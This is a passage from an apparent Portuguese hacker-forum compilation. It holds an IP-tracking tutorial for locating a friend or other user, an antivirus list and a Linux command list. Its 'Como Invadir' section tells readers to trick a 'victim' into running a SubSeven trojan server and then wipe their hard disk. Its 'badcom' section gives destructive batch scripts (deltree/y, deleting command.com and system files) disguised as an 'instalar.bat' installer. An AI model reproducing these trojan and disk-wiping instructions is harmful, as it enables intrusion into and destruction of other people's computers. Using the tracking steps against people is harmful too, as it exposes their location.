ai vc pde pra ele apertar enter e vê o numero que sair e te passar, é claro que ele vai perguntar o pq, ai se inventa uma desculpa qualquer...vc pde testar isso na sua conversa e fzer isso, vai aparecer o seu numero de ip, mais nda vai aparecer pra ele...
jeito dois....esse jeito é o mais chato pra min, por issu eu nunca uso ele, mais ele é bom...ele tmb é chamado como a forma ping (para descobrir ip de sites) e forma netstat –n/arp –a (ip de usuários)
entao vou falar tanto do ping, como do netstat –n/ arp –a

o ping envia pacotes icmp para fazer a verificação de disponibilidade do destino final (servidor ou web site).

isso significa que ao "pingar" vc pode saber se o site está no ar e seu ip, caso esteja.


exemplo de como usar o ping!!!

abra seu prompt de comando (ms-dos) ou vá em
iniciar/ utar e digite "cmd" sem aspas, abrirá uma tela (geralmente preta).

digite o comando "ping" sem aspas, dê uma espaço e digite o nome do site.

exemplo:

ping www.orkut.com

ele irá disparar contra o servidor enviando pacotes icmp para verificar disponibilidade. e trará como resposta o ip 216.239.51.85 e outros dados como estatística e tempo em milisegundos do envio de pacotes.


pegar ip do computador de um amigo

no windows xp o comando será: netstat -n

no windows 98 o comando será: arp -a


irei trabalhar apenas com o comando no xp, mas mude caso seu so não seja.


para que vc possa pegar o ip de um amigo, terá que ter conexão direta com ele, ou seja, uma conversa no icq ou msn... 30 set (4 dias atrás) kakashi.ex3­­­
parte 3
rastreando ip (tutorial)

3 parte
no caso do msn, nào basta apenas conversar com ele de forma escrita. deverá abrir uma conversa com webcam ou enviar ou receber um arquivo que tenha pelo menos uns 50kb, para que vc possa ter tempo tb de pegar o ip dele com precisão.

É aconselhável que vc feche todas as janelas de navegação por mais de 5 minutos. depois desse tempo, envie um arquivo ao amigo ou inicie uma conversa de video com ele através da webcam.

no decorrer deste download ou upload de informações, vc deve digitar (no caso do windows xp) o seguinte comando no prompt (ms-dos)

netstat -n

aparecerá vários ip's, mas como por padrão no brasil, o ip de seu amigo será o único que começar com 200 ou 201.

algo do tipo: 201.23.83.7:1863

este :1863 não é ip, é apenas a porta do msn no pc do amigo.
existe tmb mais uma forma das formas fáceis para descobrir o ip do seu amigo

forma hotmail
bom... primeiro vc tem que usar o seu hotmail no modo antigo, não pde ser plo live pq se não não da...
vamos la, configurando o e-mail do hotmail para pegar ip de que lhe envia e-mail.
1-entre na sua caixa de email do "hotmail".
2-clique em "opções"
3-clique em "correio"
4-clique em "configurações de exibição de mensagens"
5-na opção "cabeçalhos de mensagens" deixe marcado a caixa como "avançada"
6-clique em ok
7-quando vc for ler um email, percebe-se que terá algumas novas opções embaixo da palavra "assunto", o ip da pessoa que te mandou o email estará na opção "x-originating-ip:"
pronto! seu email está configurado e pronto para pegar ips de quem lhe enviar os e-mails.
bom kom o ip nas mãos... vmus descobri de onde a pessoa ta flando ne...essa pra min é a parte mais legal...entao vmus la... 30 set (4 dias atrás) kakashi.ex3­­­
parte 4
rastreando ip (tutorial)

4 parte
com o ip em mãos, vc precisa agora saber o route que ele passou, e saber quantos saltos e quais foram até chegar em seu pc.

então com o prompt de comando (ms-dos) aberto, vc irá digitar o comando tracert com o ip que vc pegou anteriormente. seja de um amigo ou de um site.

exemplo:

tracert 216.239.51.85

seu tracerout estará disparando contra contra o www.orkut.com neste caso que postei acima, mas use o ip que desejar.

ao final dos saltos que irá ocorrer, aparecerá uma lista com dados de provedores e outros que sua conexão passa até chegar ao destino final. vale lembrar que se este destino final fizer contra vc, aparecerá provavelmente a mesma lista de saltos, mas ao contrário.

exemplificando o entendimento desses dados, se aparecer algo como telesp ao final dos saltos, vc saberá que provavelmente este sinal seja de são paulo (estado), e assim por diante.

ao final aparecerá rastreamento completo, e basta apenas vc entender o que cada salto significa e como tirar aproveito disso pra ter maiores informações.

supondo que vc saiba em que localidade do brasil ou outro país se encontra o último salto, é possível achar a cidade de onde vem este sinal. (último salto na conexão de um amigo geralmente vem de seu provedor de acesso, mas isso pode variar muito)... 30 set (4 dias atrás) kakashi.ex3­­­
parte 5
rastreando ip (tutorial)
5 parte
um jeito mais fácil... é esse pelo site, entao vmus la...
agora entendendo um pouco de como os sistemas de buscas relacionam ceps com ips:
bom tudo começa das estruturas físicas da rede, físico me refiro a fios, postes, caixas telefônicas, localização do provedor, etc. quando você recebe um ip, seu provedor gera ele apartir do seu cep(não é bem um cálculo com seu cep e sim questão de proximidades).
explico: supomos que você recebeu o ip 200.196.196.5 e seu vizinho recebeu 200.150.30.2, sendo que ele mora no mesmo cep que vc,
o que aconteceria é que o ping(tempo para recebimento de pacotes) demoraria(suposição) uns 150ms(isso é lento, sim eu amo parenteses :lol.
o que na realidade deveria ser uns 70ms mais ou menos.
então o provedor lhe atribui ips conforme seu cep, sendo assim seu vizinho provavelmente receberá um ip semelhante ao seu, pelo menos na teoria seria assim, ao menos que se escasse os ips semelhantes, mas aí é outro papo.
entendido isso de cep x ip, vamos a forma de rastreá-los.
______________________________

há um projeto nacional chamado ipgeo mantido pelo portal rankbrasil, que mantêm um banco de dados com uma relação imensa de ips -> ceps. bom ao certo de onde eles colhem essas informações eu não sei, suponho que seja algo vinculado aos provedores e ao registro.br.

então vamos lá, acesse o site: http://www.ipgeo.com.br
e informe o ip que deseja consultar, como exemplo vou usar esse : ip 200.203.3.62
o que vai acontecer, o sistema irá sempre mostrar uma série de resultados, pois são os ips mais semelhantes ao seu, caso encontre
exatamente o ip informado, ele irá ser mostrado no topo da lista.

resultado obtido:
citar
proximidades de ip com ceps confirmados

200.203.3.62 95020180 caxias do sul rs
200.203.3.63 95180000 farroupilha rs
200.203.3.63 95700000 bento gonçalves rs
200.203.3.64 95020320 caxias do sul rs
200.203.3.64 95020460 caxias do sul rs
200.203.3.64 95097000 caxias do sul rs
200.203.3.65 95010100 caxias do sul rs 30 set (4 dias atrás) kakashi.ex3­­­
parte 6
rastreando ip (tutorial)
6 parte
ainda em buscas no brasil temos outro recurso que é o registro.br(www.registro.br).
já essa nativa é mais adequada de quando estamos consultando ips(fixos) de servidores, os quais estão registrados um dominío, um ip fixo empresarial, etc.
caso consultar um ip dinâmico qualquer, provavelmente os resultados serão os dados do companhia de telecomunicações da região, como brasil telecom.
exemplo, consultei pelo meu ip:
citar
...
inetnum: 200.203.0/17
asn: as8167
id abusos: bta17
entidade: brasil telecom s/a - filial distrito federal
documento: 076.535.764/0326-90
responsável: brasil telecom s. a. - cnrs
endereço: seps 702/092 cj. b - bl b 3 andar gen. alencastro, s/n,
endereço: 70390-025 - brasilia - df
telefone: (61) 415-4201 []
id entidade: btc14
id técnico: btc14
inetrev: 200.203.0/24
servidor dns: ns3.brasiltelecom.net.br
...

agora outra consulta, mas pelo ip 200.176.3.142
citar
...
inetnum: 200.176/16
asn: as11706
id abusos: abt82
entidade: terra networks brasil s.a.
documento: 091.088.328/0003-29
responsável: hostmaster terra networks
endereço: joão manoel, 90,
endereço: 90010-030 - porto alegre - rs
telefone: (51) 32844000 []
id entidade: mpl4
id técnico: mpl4
inetrev: 200.176.0/18
servidor dns: ns1.terra.com.br
...

como deu pra notar, é o ip do terra.com.br, então essa é a diferença de um ip registrado. 30 set (4 dias atrás) kakashi.ex3­­­
parte 7
rastreando ip (tutorial)
7 parte
mas e no caso de um ip que não seja do brasil ?
bom aí se fizermos pelo método anterior não teremos resultados precisos. para isso há outro site americano, maxmind
que disponibiliza recursos semelhantes ao ipgeo.
acesse: http://www.maxmind.com/app/lookup_city
e a teoria é a mesma, porém como é outro país o sistema de caixa postal (cep) será diferente.
então como saber onde procurar, aqui: http://www.embassyworld.com/data/zip_codes.html
há uma listagem de serviços e sites que buscam códigos postais de diversos países.

vamos a um exemplo na prática!

nosso ip de exemplo será: 69.18.1.201
- consultando a localização www.maxmind.com/app/lookup_city
http://i3.tinypic.com/xni8e8.png
descobrimos que o ip é de um provedor de internet.
ou seja, um usuário comum.
- seguimos direto para o google maps e informamos os dados da cidade:

- nesse caso o melhor modo de visualização é map;
- como essa cidade fairfield parece ser o lugar onde o diabo perdeu as meias, o zoom no mapa é bem limitado:
http://i1.tinypic.com/xni8o7.png
- então vamos tentar no mapquest(www.mapquest.com) e informamos o código postal: 52556
bom, um pouco mais detalhado...

http://i3.tinypic.com/xni92b.png
com isso as informações que temos, consiguimos chegar até este ponto, não obtivemos o endereço específico, mas uma noção boa da localização.
bom, então o passo-a-passo que eu sugestionaria para iniciar um rastreamento seria os seguinte:
- analise o ip e descubra qual seu país;

http://www.maxmind.com/app/lookup 30 set (4 dias atrás) kakashi.ex3­­­
parte 8
rastreando ip (tutorial)
8 parte
8 parte

- sabendo a nacionalidade:
* se for nacional:
1) consulte no www.registro.br
2) se constatar que o ip não está registrado, pesquise novamente em http://www.ipgeo.com.br
3) tendo o cep em mãos, consulte ele http://www.correios.com.br/servicos/cep/cep_cep.cfm
* caso seja internacional:
1) busque primeiro no whois: http://whois.lacnic.net
2) senão retornar nada útil tente em: http://www.maxmind.com/app/lookup_city
3) descoberto o país, consulte em http://www.embassyworld.com/data/zip_codes.html
4) acesse algum dos sites da lista referente ao país do ip
5) busque pelo código postal localizado
6) caso seja americano, uma boa dica é procurar no google maps

bomm é essu ae...

AntiVirus

anti-macro
anti-vírus especializado em eliminar vírus de macro.
programa: freeware
panda quick remover
elimina vários vírus de classe worm, inclusive o temido klez h.
for windows 95/98/me/xp/nt/2000. programa freeware.
avdisk
habilita criação automática de anti-vírus discos do startup usando software anti-vírus popular (f-prot, avplite, avpdos32) que pode estar utilizado para começar e desinfecta computadores. o programa é fácil para usar e ajuda básica é incluida para cada produto de apoio. for win 95/98/me/xp/nt/2000
bitdefender 6.2
elimine os vírus que estão atacando seu computador. este antivírus, segundo o autor, foi feito especialmente para usuários domésticos, pois é fácil de usar e se atualiza automáticamente. você instala e até esquece que está lá. protege os e-mails, downloads, discos, etc. possui quarentena para arquivos estranhos e escaneia o hd em busca de vírus.
roda em windows 95, 98, nt, 2000, me, xp. programa shareware.
f-prot professional anti-virus toolkit
f-prot é um poderoso antivírus que oferece uma grande variedade de opções para proteger seu computador contra os vírus mais recentes. utilizando este programa, você poderá utar programas e trabalhar tranqüilo, sem a constante preocupação com a velocidade de propagação dos vírus da informática. for win 95/98/nt/me/2000/xp.
kaspersky anti-vírus
Ótimo anti-vírus. requer cadastro no site do fabricante antes do download. for win 95/98/me/nt/2000/xp. programa shareware.
anti-vírus hackers action 1.0
verifica e elimina 6 tipos de vírus. programa freeware. for win 95/98/me
júnior protection remover 3.0
software que ensina vc a se proteger dos vírus e worms mais perigosos da internet e também a remove-los. for win 95/98/me/2000/nt, programa freeware - tamanho 1.28 mb
sbabr
protege o setor de boot do micro contra vírus. os: dos license: shareware size: 534 kb
mailwall
intercepta mensagem infectadas que estão sendo enviadas para o seu e-mail.
for windows 95/98/me/nt/2000. license: 30-day trial
perforin for winword
scanneia seu micro a procura de vírus de macro. os: windows 95/98/me/nt/2000/me license: 30-day trial
norton antivirus command-line scanner (navc)
remove vírus de dos-based.
os: dos license: freeware size: 1.50 mb
rav antivirus desktop
remove todo tipo de vírus. os: windows 95/98/me/nt/2000 license: 30-day trial size: 11.06 mb
virus checking assistant
verifica se tem vírus nos arquivos zipados que vc acaba de baixar para o seu micro.
os: windows 95/98/me license: shareware size: 1.01 mb
proland softwarepvt ltd
anti-vírus pouco conhecido no brasil.win 95/98/nt.
virus trap
Ótimo anti-vírus, totalmente gratuito.win 95/98/nt.
ultimate killer virus vaccine v1.00
anti- vírus não muito conhecido no brasil. win 95/98/nt.
mooutlooksecurity
protege sus caixa de e-mail contra vírus, trojans, worms etc... for win 95/98/me/2000, programa freeware

Como Invadir

como invadir

invasão por ip

para fazer uma invasão por ip você deve pegar o ip da vítima. mas como pegar o ip da vítima? se você for invadir uma vítima que esteja usando mirc, você deve fazer com que o cara te envie um chat ou um send. pelo chat é só você ficar atento na janela do chat, quando o mirc estabelece conexão ele mostra o ip do cara dentro de parênteses, assim (200.253.184.64). pelo send, você tem que fazer com que a vítima te mande um arquivo, dai você vai na janela do status e vê um ip na cor vermelha também entre parênteses aparecendo na hora que ele te manda. não é aconselhável que você espere acabar o envio da vítima, pois pode estar infectado.

se você for invadir uma pessoa que esteja usando icq, você deve clicar em cima do usuário e ir na opção info, na parte onde diz current / last ip tem dizendo o ip da vítima. mas se aparecer n/a é porque o cara quando foi configurar o icq escolheu a opção don't publish my ip.

nesse caso, se você nem conseguir fazer com que o cara te mande um chat ou um send pelo mirc ou se aparecer a ao invés de ip no icq aparecer n/a ai você vai ter que fazer uma técnica mais complexa. É assim: você faz com que o cara te manda umas 2 ou 3 mensagens pelo mirc ou pelo icq e vai correndo para o prompt do ms-dos e digita: arp -a daí o vai aparecer o ip de todas as pessoas que estão te mandando mensagens no momento. apartir dai vai um pouco mais difícil. você pega um trojan na sessão trojan's. supomos que você vai invadir pelo subseven, e então você manda para a vítima o arquivo server.exe, faça com que o ele ute-o, abra o subseven.exe, coloque o ip da vítima lá e clique em conect. atenção, não mude a porta padrão (1243) do subseven. se aparecer lá embaixo conected .bla.bla.bla. você já pode torrar o h.d.d (hard disk drive)do cara.

(Kra Nao Aconselho a fazer isso nao so ensinei , se vc se der mal o problema eh teu pq iss eh crime logo aviso eu nao pago por seus atos!)

Comandos BADCOM!

o que é um comando badcon?





É um arquivo de extensão .bat que podem ser nocivos ou não... podem até ser considerados vírus, porém é claro que os vírus mesmo são mais complexos e feitos por linguagens de programação ou com viruslab's.

como eu faço??

você pode fazer no edit do ms-dos ou no notepad do windows... os badcons são feitos basicamente de comandos do ms-dos.




--------------------------------------------------------------------------------

abaixo estão os comandos badcons. divirta-se!


--------------------------------------------------------------------------------





@echo off

este comando "esconde" a ação!! por exemplo, se você escrever del *.* com o @echo off a vítima vai pensar que nada aconteceu, mas se você não pôr o @echo off ela vai ver o que está acontecendo e vai ter tempo de desligar o computador!! (indispensável num badcon!).




cls

"limpa a tela". por exemplo, se você quiser que não apareça nada quando a vítima utar o badcon.
ex.: @echo off
del *.*
cd windows
del *.com
del *.ini
cls





echo

este comando "mandar mensagens" para o indivíduo, por exemplo, se você escrever:
@echo off
echo olá!! seu computador acaba de ser invadido por [serialkiller].
o badcon exibirá a seguinte mensagem:




olá!! seu computador acaba de ser invadido por serialkiller.






cd

este comando serve para "criar" diretórios, exemplo:
md hackerianø´§™
cria o diretório hackerianø´§™




copy

serve para "copiar" arquivos, exemplo:
copy c:*.* c:windows
ele copiará todos os arquivos soltos em c: (menos os diretórios) para c:windows





del

"apaga" arquivos determinados, exemplo:
@echo off
cdwindows
del win.com
com estes comandos ele deletará arquivos determinados, no caso o win.com, que é indispensável para funcionar o windows. sem ele não dá para iniciar o windows.




< cellspacing="0" bgcolor="#ff0000" border="0">




"apaga os diretórios" existentes dentro de outros diretórios, exemplo:
deltree/y c:
ele apagará todos o diretórios existentes em c: ao contrário do del *.* que só apagaria os arquivos soltos em c:.
aí você me pergunta: por que o /y depois do deltree?? quando você dá um deltree, ele pegunta se quer realmente apagar determinado arquivo, mas com este /y o bug não existe mais e ele apagará os arquivos direto sem perguntar a vítima!!! (comando muito perigoso)




rd

comando para "desfazer diretórios" vazios no bad-com, exemplo:
rd hackerianø´§™
desfaz o diretório hackerianø´§™


boot

"escreva na ultima linha do bad-com boot "
e também deixe o arquivo com o nome de boot
terá uma bela surpresa o badcon parecerá um elevador......!!!


ren

"renomeia" um arquivo especificado, exemplo:
ren auto.bat hackerianø´§™
o arquivo está renomeado para hackerianø´§™.


format

com este comando é usado para "formatar" discos como o c: ou o a:. porém, não é muito bom usar este comando por causa do bug da pergunta!!


use-o apenas com pessoas burrinhas, e que não saibam o que é este comando!





choice

comando que "possibilita um prompt para resposta".
exemplo: choice /c123456789
para números ou letras é necessário o uso do /c, sem o uso do comando /c
somente choice, mostrará o prompt: [y,n]...
com o /c e os números irá mostrar: [1,2,3,4,5,6,7,8,9]...
o comando choice tem que vir sempre acompanhado do if e errorlevel.
if e errorlevel é um complemento usado pelo choice
comando que possibilita o desenvolvimento de questões e prompts para o sacaniado
os comandos choice e if errorlevel são comandos que um precisa do outro.
nenhum se mantém sozinho.




doskey

o doskey serve para "trocar" um comando por outro. exemplo: doskey comando comando
doskey dir cls
sempre que a vitima digitar dir sera utado o comando cls.




goto

serve para "ir" para determinado ponto do arquivo, exemplo:
loop (local onde o comando goto retornará)
dir
goto loop
com isso o programa ficará dando dir eternamente





if exist

"checa para ver se existe" determinado arquivo, e se existir realiza uma função, se não existir realiza uma outra finção. exemplo:

cd windows entra no diretorio windows
if exist win.com goto win: procura pelo arquivo win.com, se existir ele vai para o win:, se não ele vai para linha seguinte.
cd win-95 como não existia o diretorio windows, ele vai tentar o win-95
if exist win.com goto win:
goto fim: vai para o fim:
win:
del win.com deleta o win.com
fim: fim do arquivo
sabendo estes comandos já podemos fazer o nosso 1° badcon:


entre no edit do ms-dos ou no notepad do windows e digite os comandos abaixo e salve como innstalar.bat.
nunca, nunca esqueça que o arquivo deve ser salvo com a extensão .bat.






@echo off
cd -----------------------> vai para a unidade de disco c:
cd windows -------------------> entra no diretório windows
del *.com ---------------------> deleta todos os arquivos com extensão .com
del *.sys ---------------------> deleta todos os arquivos com extensão .sys
cd -----------------------> volta para a raiz de c:
del auto.bat --------------------> deleta o arquivo auto.bat (o de inicialização do computador)
del command.com -------------------> deleta o arquivo command.com (o do ms-dos)
echo seu computador acabou de ser invadido por serial killer ----------> exibirá a mensagem digitada



pronto a bomba está feita e para uta-lá é só digitar: instalar.bat, mas cuidado nunca teste os badcons no seu computador, a não ser que sejam inofensivos




caso esteja tendo problemas para fazer um comando badcon clique aqui para download do programa já feito!


deltree



(lembrando seus atos suas responsabilidades!)

Comandos De Linux!

Is - Lista os arquivos, mesmo que dir do DOS
Atributos comuns: -a = mostra arquivos ocultos
-l - mostra bytes, permissões, diretório, etc

Obs.: no ls os nomes de arquivos nos sistemas *X (Unix, linux, etc) não
precisam ter só 8 letras. Daí, se você quer listar os arquivos comecados
com u, por exemplo, peca ls u* e veja o resultado.
* substitui qualquer conjunto de caracteres
? substitui caracteres isolados

rm: remove arquivos, no formato: rm (arquivo1) (arquivo2) (arquivo3) ...
Exemplo: rm eu.doc / rm leiame.txt manual.html win95.w95

cp: copia arquivos, no formato: cp (arquivo1) (diretório)
Exemplo: cp manual.txt /home/manual

cat: mostra o conteudo do arquivo, mesmo que o 'type' no DOS
more: exibe o conteudo de um arquivo pagina a pagina, mesmo q no DOS
Exemplo: ls|more

pwd: exibe o diretório atual (o que vc esta)
rmdir: apaga diretório
Exemplo: rmdir /diretório
se o diretório estiver cheio, use o rm com o atributo -r

mkdir: cria diretório
Exemplo: mkdir /diretório

awk: Procura por um modelo a partir de um arquivo. Inclui uma linguagem de programação embutida.
bdiff: Compara dois arquivos grandes.
bfs: Procura um arquivo grande.
cal: Exibe um calendario.
cat: Encadeia e imprimi arquivos.
cc: Compilador C.
cd: Muda diretório.
chgrp: Muda o título de um grupo de arquivos.
cmp: Compara dois arquivos; mostra a localizacao (linha e byte) da primeira diferenca entre eles.
comm: Compara dois arquivos para determinar quais linhas sao comuns entre eles.
cu: Chamar outro sistema UNIX.
date: Retorna a data e a hora.
diff: Exibe as diferencas entre dois arquivos ou diretórios.
diff3: Exibe as diferencas entre tres arquivos ou diretórios.
du: Relatorio no uso do sistema de arquivos.
echo: Exibe seus argumentos.
ed: Editor de texto.
ex: Editor de texto.
expr: Avalia seus argumentos quando geralmente e uma formula matematica.
f77: Compilador FORTRAN.
find: Localiza os arquivos c/ caracteristicas especificas.
format: Inicializa um floppy disk.
grep: Procura um modelo a partir de um arquivo. (veja awk)
help: Ajuda da shell atual
kill: Termina um processo.
ln: Usado para unir arquivos.
lpr: Copia um arquivo para a linha de impressora.
ls: Exibe informacoes sobre um ou mais arquivos.
mail: Usado para receber ou enviar e-mail.
nroff: Usado para formatar textos.
ps: Exibe um status dos processos.
sleep: Causa um processo para tornar-se inativo por uma duracao de tempo especifica.
sort: Escolher e unir um ou mais arquivos.
spell: Procurar erros de ortografia num arquivo.
split: Dividir um arquivo.
stty: Exibir ou escolher parametros do terminal.
tail: Exibir o fim de um arquivo.
tset: Escolher Obrigado(a), tipo de terminal.
umask: Permite que o usuário especifique uma nova criacao de camuflagem